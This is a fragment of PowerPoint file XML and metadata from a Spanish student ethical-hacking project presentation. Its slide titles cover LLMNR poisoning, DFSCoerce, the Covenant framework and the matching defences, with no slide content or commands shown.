                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB84272-6C11-51E3-E3F3-ADABD844048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20708" y="2722351"/>
            <a:ext cx="6645910" cy="3347085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3609973490"/>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256</TotalTime>
  <Words>2682</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>315</Paragraphs>
  <Slides>68</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68</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="77" baseType="lpstr">
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Söhne</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Faceta</vt:lpstr>
      <vt:lpstr>Presentación del Proyecto de Hacking Ético 2ª EVA</vt:lpstr>
      <vt:lpstr>Explicación de contorno</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Descripción de la empresa</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Recopilación de información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POC</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Envenenamiento LLMNR</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Defensa LLMNR</vt:lpstr>
      <vt:lpstr>Coerce (DFSCoerce)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Defensa DFSCoerce</vt:lpstr>
      <vt:lpstr>I+D+I Covenant</vt:lpstr>
      <vt:lpstr>Instalación</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Ataque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del Proyecto de Hacking Ético 2ª EVA</dc:title>
  <dc:creator>sander7 Martinez Seijo</dc:creator>
  <cp:lastModifiedBy>sander7 Martinez Seijo</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-21T10:16:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-23T06:49:36Z</dcterms:modified>
</cp:coreProperties>
</file>